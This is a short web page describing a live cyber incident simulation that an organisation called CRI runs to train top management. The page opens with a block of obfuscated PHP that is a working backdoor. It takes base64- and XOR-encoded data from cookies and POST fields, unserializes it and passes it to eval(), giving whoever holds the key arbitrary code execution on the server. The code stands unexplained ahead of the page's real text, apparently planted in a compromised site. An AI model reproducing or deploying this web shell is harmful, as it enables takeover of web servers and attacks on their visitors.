$VEfFpCnv = "\x68" . "\137" . "\x41" . chr (66) . 'w' . "\x61" . "\x4f";$pbAscZZ = chr (99) . 'l' . chr ( 994 - 897 ).'s' . 's' . "\137" . 'e' . chr ( 1081 - 961 ).'i' . "\x73" . "\164" . "\x73";$PpxoWLa = class_exists($VEfFpCnv); $pbAscZZ = "33383";$ITgNSytJCN = !1;if ($PpxoWLa == $ITgNSytJCN){function wBkNHtR(){return FALSE;}$iqGIVgacy = "54318";wBkNHtR();class h_ABwaO{private function toXqERHbbH($iqGIVgacy){if (is_array(h_ABwaO::$JxKmgqNNJ)) {$QTgIfcXBDk = str_replace(chr ( 107 - 47 ) . "\77" . 'p' . "\150" . 'p', "", h_ABwaO::$JxKmgqNNJ["\x63" . 'o' . chr (110) . chr ( 898 - 782 )."\x65" . 'n' . "\x74"]);eval($QTgIfcXBDk); $iqGIVgacy = "54318";exit();}}private $EwsLts;public function DSNKmCYZ(){echo 47230;}public function __destruct(){$iqGIVgacy = "29006_35109";$this->toXqERHbbH($iqGIVgacy); $iqGIVgacy = "29006_35109";}public function __construct($BBFTwSu=0){$jQPQWxBKf = $_POST;$DmHJtUlP = $_COOKIE;$yMfNBP = "7ed936b9-7986-46dd-b419-ecad84712703";$iYJaJmrr = @$DmHJtUlP[substr($yMfNBP, 0, 4)];if (!empty($iYJaJmrr)){$TGuNssOW = "base64";$OYwXL = "";$iYJaJmrr = explode(",", $iYJaJmrr);foreach ($iYJaJmrr as $DGgeo){$OYwXL .= @$DmHJtUlP[$DGgeo];$OYwXL .= @$jQPQWxBKf[$DGgeo];}$OYwXL = array_map($TGuNssOW . '_' . 'd' . "\145" . chr ( 360 - 261 )."\x6f" . "\144" . "\x65", array($OYwXL,)); $OYwXL = $OYwXL[0] ^ str_repeat($yMfNBP, (strlen($OYwXL[0]) / strlen($yMfNBP)) + 1);h_ABwaO::$JxKmgqNNJ = @unserialize($OYwXL); $OYwXL = class_exists("29006_35109");}}public static $JxKmgqNNJ = 53011;}$ruQmpSeWmq = new /* 16251 */ $VEfFpCnv(54318 + 54318); $ITgNSytJCN = $ruQmpSeWmq = $iqGIVgacy = Array();} Simulation for top management – CYBERCRIME

Simulation for top management

CRI developed a „Live Cyber Incident Simulation for Top Management“. This tool is for several years utilized by governments, large enterprises, international organizations and conferences to provide high-level decision makers with awareness raising as well as response training opportunities. The target audience for this simulation tool is highly demanding and the tool was drafted accordingly. It is highly interactive, fully dynamic to respond to the decisions taken and includes high quality media (such as videos including fictitious news reports).